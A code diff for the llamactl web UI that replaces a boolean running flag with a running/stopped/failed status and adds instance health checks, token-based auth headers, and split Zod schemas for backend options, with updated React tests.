vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
screen.getByTestId('delete-instance').click() screen.getByTestId("delete-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument() expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
}) });
}) });
describe('Error Management', () => { describe("Error Management", () => {
it('clears error when clearError is called', async () => { it("clears error when clearError is called", async () => {
const errorMessage = 'Test error' const errorMessage = "Test error";
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage)) vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage) expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
}) });
screen.getByTestId('clear-error').click() screen.getByTestId("clear-error").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('error')).toHaveTextContent('no-error') expect(screen.getByTestId("error")).toHaveTextContent("no-error");
}) });
}) });
}) });
describe('State Consistency', () => { describe("State Consistency", () => {
it('maintains consistent state during multiple operations', async () => { it("maintains consistent state during multiple operations", async () => {
// Test that operations don't interfere with each other // Test that operations don't interfere with each other
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-instance', name: "new-instance",
running: false, status: "stopped",
options: {} options: {},
} };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance) vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
renderWithProvider(<TestComponent />) renderWithProvider(<TestComponent />);
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('loading')).toHaveTextContent('false') expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId('instances-count')).toHaveTextContent('2') expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
}) });
// Create new instance // Create new instance
screen.getByTestId('create-instance').click() screen.getByTestId("create-instance").click();
await waitFor(() => { await waitFor(() => {
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
}) });
// Start an instance (this should not affect the count) // Start an instance (this should not affect the count)
screen.getByTestId('start-instance').click() screen.getByTestId("start-instance").click();
await waitFor(() => { await waitFor(() => {
expect(instancesApi.start).toHaveBeenCalled() expect(instancesApi.start).toHaveBeenCalled();
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') // Still 3 expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change // But the running state should change
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true') expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
}) "instance2:running"
}) );
}) });
}) });
});
});
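
The tests above track the schema change from a boolean running flag to a tri-state status field. As a minimal sketch of what consumers gain from this, a hypothetical helper (not part of this diff) can now tell a failed instance apart from a cleanly stopped one:

import type { Instance } from "@/types/instance";

// Hypothetical helper, not part of the PR: maps the tri-state status to a label.
function statusLabel(instance: Instance): string {
  switch (instance.status) {
    case "running":
      return `${instance.name} is running`;
    case "stopped":
      return `${instance.name} is stopped`;
    case "failed":
      return `${instance.name} failed to start`;
  }
}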


@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'

export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
  const [health, setHealth] = useState<HealthStatus | undefined>()

  useEffect(() => {
    if (instanceStatus === "stopped") {
      setHealth({ status: "unknown", lastChecked: new Date() })
      return
    }

    if (instanceStatus === "failed") {
      setHealth({ status: instanceStatus, lastChecked: new Date() })
      return
    }
@@ -17,9 +22,9 @@
      setHealth(healthStatus)
    })

    // Cleanup subscription on unmount or when instanceStatus changes
    return unsubscribe
  }, [instanceName, instanceStatus])

  return health
}
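
For reference, callers now pass the instance status straight through instead of deriving a boolean. A rough usage sketch, with the component name and import path assumed rather than taken from this diff:

import { useInstanceHealth } from '@/hooks/useInstanceHealth' // import path assumed
import type { Instance } from '@/types/instance'

// Hypothetical badge component illustrating the new hook signature.
function HealthBadge({ instance }: { instance: Instance }) {
  const health = useInstanceHealth(instance.name, instance.status)
  return <span>{health?.status ?? 'unknown'}</span>
}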


@@ -10,18 +10,31 @@ async function apiCall<T>(
): Promise<T> {
  const url = `${API_BASE}${endpoint}`;

  // Get auth token from sessionStorage (same as AuthContext)
  const storedKey = sessionStorage.getItem('llamactl_management_key');

  // Prepare headers with auth
  const headers: Record<string, string> = {
    "Content-Type": "application/json",
    ...(options.headers as Record<string, string>),
  };

  // Add auth header if available
  if (storedKey) {
    headers['Authorization'] = `Bearer ${storedKey}`;
  }

  try {
    const response = await fetch(url, {
      ...options,
      headers,
    });

    // Handle authentication errors
    if (response.status === 401) {
      throw new Error('Authentication required');
    }

    if (!response.ok) {
      // Try to get error message from response
      let errorMessage = `HTTP ${response.status}`;
@@ -47,7 +60,7 @@ async function apiCall<T>(
      const text = await response.text();
      return text as T;
    } else {
      const data = await response.json() as T;
      return data;
    }
  } catch (error) {
@@ -121,4 +134,7 @@ export const instancesApi = {
    const params = lines ? `?lines=${lines}` : "";
    return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
  },

  // GET /instances/{name}/proxy/health
  getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
};
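
Because every request now flows through this wrapper, callers get the Bearer header and the 401 mapping for free. A sketch of the failure path, using only what the diff defines (the helper function itself and the recovery step are illustrative):

import { instancesApi } from '@/lib/api'

// Illustrative helper: a 401 surfaces as Error('Authentication required'),
// which callers can branch on before rethrowing.
async function probeHealth(name: string) {
  try {
    return await instancesApi.getHealth(name)
  } catch (err) {
    if (err instanceof Error && err.message === 'Authentication required') {
      sessionStorage.removeItem('llamactl_management_key') // recovery step assumed
    }
    throw err
  }
}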


@@ -1,4 +1,5 @@
import { type HealthStatus } from '@/types/instance'
import { instancesApi } from '@/lib/api'

type HealthCallback = (health: HealthStatus) => void
@@ -8,31 +9,33 @@ class HealthService {
  async checkHealth(instanceName: string): Promise<HealthStatus> {
    try {
      await instancesApi.getHealth(instanceName)
      return {
        status: 'ok',
        lastChecked: new Date()
      }
    } catch (error) {
      if (error instanceof Error) {
        // Check if it's a 503 (service unavailable - loading)
        if (error.message.includes('503')) {
          return {
            status: 'loading',
            message: 'Instance is starting up',
            lastChecked: new Date()
          }
        }

        return {
          status: 'error',
          message: error.message,
          lastChecked: new Date()
        }
      }

      return {
        status: 'error',
        message: 'Unknown error',
        lastChecked: new Date()
      }
    }
@@ -82,7 +85,7 @@ class HealthService {
      }, 60000)

      this.intervals.set(instanceName, interval)
    }, 5000)
  }

  private stopHealthCheck(instanceName: string): void {
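
Note that the 503 branch relies on apiCall embedding the HTTP status in the thrown Error message ("HTTP 503" by default). A small sketch of the resulting mapping; the logging function is illustrative:

import { healthService } from '@/lib/healthService'

// Sketch of what checkHealth now returns:
//   getHealth resolves            -> { status: 'ok' }
//   Error whose message has '503' -> { status: 'loading' } (instance starting up)
//   any other Error               -> { status: 'error', message: error.message }
async function logHealth(name: string) {
  const health = await healthService.checkHealth(name)
  console.log(name, health.status, health.message ?? '')
}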


@@ -1,8 +1,7 @@
import { type CreateInstanceOptions, type BackendOptions, getAllFieldKeys, getAllBackendFieldKeys } from '@/schemas/instanceOptions'

// Instance-level basic fields (not backend-specific)
export const basicFieldsConfig: Record<string, {
  label: string
  description?: string
  placeholder?: string
@@ -22,6 +21,28 @@ export const basicFieldsConfig: Record<string, {
    placeholder: '5',
    description: 'Delay in seconds before attempting restart'
  },
  idle_timeout: {
    label: 'Idle Timeout (minutes)',
    placeholder: '60',
    description: 'Time in minutes before instance is considered idle and stopped'
  },
  on_demand_start: {
    label: 'On-Demand Start',
    description: 'Start instance upon receiving OpenAI-compatible API request'
  },
  backend_type: {
    label: 'Backend Type',
    description: 'Type of backend to use for this instance'
  }
}

// Backend-specific basic fields (these go in backend_options)
export const basicBackendFieldsConfig: Record<string, {
  label: string
  description?: string
  placeholder?: string
  required?: boolean
}> = {
  model: {
    label: 'Model Path',
    placeholder: '/path/to/model.gguf',
@@ -48,6 +69,10 @@
  return key in basicFieldsConfig
}

export function isBasicBackendField(key: keyof BackendOptions): boolean {
  return key in basicBackendFieldsConfig
}

export function getBasicFields(): (keyof CreateInstanceOptions)[] {
  return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
}
@@ -56,5 +81,13 @@
  return getAllFieldKeys().filter(key => !isBasicField(key))
}

export function getBasicBackendFields(): (keyof BackendOptions)[] {
  return Object.keys(basicBackendFieldsConfig) as (keyof BackendOptions)[]
}

export function getAdvancedBackendFields(): (keyof BackendOptions)[] {
  return getAllBackendFieldKeys().filter(key => !isBasicBackendField(key))
}

// Re-export the Zod-based functions
export { getFieldType, getBackendFieldType } from '@/schemas/instanceOptions'
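
A form renderer can now build two sections from these helpers, one for instance-level fields and one for backend flags. A sketch, with the import path assumed:

import {
  getBasicFields,
  getBasicBackendFields,
  getFieldType,
  getBackendFieldType,
} from '@/lib/zodFormUtils' // import path assumed

// Instance-level section (auto_restart, idle_timeout, backend_type, ...)
for (const key of getBasicFields()) {
  console.log('instance field:', key, getFieldType(key))
}

// Backend section, rendered under backend_options (model, ...)
for (const key of getBasicBackendFields()) {
  console.log('backend field:', key, getBackendFieldType(key))
}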


@@ -3,11 +3,14 @@ import ReactDOM from 'react-dom/client'
import App from './App'
import { InstancesProvider } from './contexts/InstancesContext'
import './index.css'
import { AuthProvider } from './contexts/AuthContext'

ReactDOM.createRoot(document.getElementById('root')!).render(
  <React.StrictMode>
    <AuthProvider>
      <InstancesProvider>
        <App />
      </InstancesProvider>
    </AuthProvider>
  </React.StrictMode>,
)


@@ -1,12 +1,8 @@
import { BackendType } from '@/types/instance'
import { z } from 'zod'

// Define the backend options schema (previously embedded in CreateInstanceOptionsSchema)
export const BackendOptionsSchema = z.object({
  // Common params
  verbose_prompt: z.boolean().optional(),
  threads: z.number().optional(),
@@ -14,12 +10,12 @@
  cpu_mask: z.string().optional(),
  cpu_range: z.string().optional(),
  cpu_strict: z.number().optional(),
  prio: z.number().optional(),
  poll: z.number().optional(),
  cpu_mask_batch: z.string().optional(),
  cpu_range_batch: z.string().optional(),
  cpu_strict_batch: z.number().optional(),
  prio_batch: z.number().optional(),
  poll_batch: z.number().optional(),
  ctx_size: z.number().optional(),
  predict: z.number().optional(),
@@ -82,7 +78,7 @@
  seed: z.number().optional(),
  sampling_seq: z.string().optional(),
  ignore_eos: z.boolean().optional(),
  temp: z.number().optional(),
  top_k: z.number().optional(),
  top_p: z.number().optional(),
  min_p: z.number().optional(),
@@ -109,7 +105,7 @@
  json_schema: z.string().optional(),
  json_schema_file: z.string().optional(),

  // Example-specific params
  no_context_shift: z.boolean().optional(),
  special: z.boolean().optional(),
  no_warmup: z.boolean().optional(),
@@ -149,8 +145,6 @@
  no_prefill_assistant: z.boolean().optional(),
  slot_prompt_similarity: z.number().optional(),
  lora_init_without_apply: z.boolean().optional(),
  draft_max: z.number().optional(),
  draft_min: z.number().optional(),
  draft_p_min: z.number().optional(),
@@ -176,22 +170,57 @@
  fim_qwen_14b_spec: z.boolean().optional(),
})

// Define the main create instance options schema
export const CreateInstanceOptionsSchema = z.object({
  // Restart options
  auto_restart: z.boolean().optional(),
  max_restarts: z.number().optional(),
  restart_delay: z.number().optional(),
  idle_timeout: z.number().optional(),
  on_demand_start: z.boolean().optional(),

  // Backend configuration
  backend_type: z.enum([BackendType.LLAMA_CPP]).optional(),
  backend_options: BackendOptionsSchema.optional(),
})

// Infer the TypeScript types from the schemas
export type BackendOptions = z.infer<typeof BackendOptionsSchema>
export type CreateInstanceOptions = z.infer<typeof CreateInstanceOptionsSchema>

// Helper to get all field keys for CreateInstanceOptions
export function getAllFieldKeys(): (keyof CreateInstanceOptions)[] {
  return Object.keys(CreateInstanceOptionsSchema.shape) as (keyof CreateInstanceOptions)[]
}

// Helper to get all backend option field keys
export function getAllBackendFieldKeys(): (keyof BackendOptions)[] {
  return Object.keys(BackendOptionsSchema.shape) as (keyof BackendOptions)[]
}

// Get field type from Zod schema
export function getFieldType(key: keyof CreateInstanceOptions): 'text' | 'number' | 'boolean' | 'array' | 'object' {
  const fieldSchema = CreateInstanceOptionsSchema.shape[key]
  if (!fieldSchema) return 'text'
  // Handle ZodOptional wrapper
  const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
  if (innerSchema instanceof z.ZodBoolean) return 'boolean'
  if (innerSchema instanceof z.ZodNumber) return 'number'
  if (innerSchema instanceof z.ZodArray) return 'array'
  if (innerSchema instanceof z.ZodObject) return 'object'
  return 'text' // ZodString and others default to text
}

// Get field type for backend options
export function getBackendFieldType(key: keyof BackendOptions): 'text' | 'number' | 'boolean' | 'array' {
  const fieldSchema = BackendOptionsSchema.shape[key]
  if (!fieldSchema) return 'text'
  // Handle ZodOptional wrapper
  const innerSchema = fieldSchema instanceof z.ZodOptional ? fieldSchema.unwrap() : fieldSchema
  if (innerSchema instanceof z.ZodBoolean) return 'boolean'
  if (innerSchema instanceof z.ZodNumber) return 'number'
  if (innerSchema instanceof z.ZodArray) return 'array'
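
A quick sketch of the split schemas validating a payload; the option values are illustrative, but every key appears either in the schema hunks above or in the tests earlier in this diff:

import { CreateInstanceOptionsSchema } from '@/schemas/instanceOptions'
import { BackendType } from '@/types/instance'

// Backend flags now live under backend_options rather than at the top level.
const parsed = CreateInstanceOptionsSchema.parse({
  auto_restart: true,
  idle_timeout: 60,
  backend_type: BackendType.LLAMA_CPP,
  backend_options: { model: '/path/to/model.gguf', ctx_size: 4096, temp: 0.7 },
})
console.log(parsed.backend_options?.model)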


@@ -2,14 +2,22 @@ import type { CreateInstanceOptions } from '@/schemas/instanceOptions'
export { type CreateInstanceOptions } from '@/schemas/instanceOptions'

export const BackendType = {
  LLAMA_CPP: 'llama_cpp'
} as const

export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]

export type InstanceStatus = 'running' | 'stopped' | 'failed'

export interface HealthStatus {
  status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
  message?: string
  lastChecked: Date
}

export interface Instance {
  name: string;
  status: InstanceStatus;
  options?: CreateInstanceOptions;
}
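
The as-const object plus the indexed type gives a string-literal enum without TypeScript's enum keyword; BackendTypeValue currently resolves to just 'llama_cpp' and widens automatically when a new backend is added to the object:

import { BackendType, type BackendTypeValue } from '@/types/instance'

// Type-checks because BackendTypeValue is the union of the object's values.
const backend: BackendTypeValue = BackendType.LLAMA_CPP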

webui/src/vite-env.d.ts (new file, vendored)

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />

declare global {
  interface ImportMetaEnv {
    readonly VITE_APP_VERSION?: string
  }

  interface ImportMeta {
    readonly env: ImportMetaEnv
  }
}

export {}
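
With this declaration in place, reading the version anywhere in the app type-checks; a minimal sketch (the fallback string is illustrative):

// import.meta.env is typed by the declaration above.
const version: string | undefined = import.meta.env.VITE_APP_VERSION
console.log(`llamactl webui ${version ?? 'dev'}`)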


@@ -18,8 +18,9 @@
    "baseUrl": ".",
    "paths": {
      "@/*": ["./src/*"]
    },
    "types": ["vite/client"]
  },
  "include": ["src", "src/vite-env.d.ts"],
  "references": [{ "path": "./tsconfig.node.json" }]
}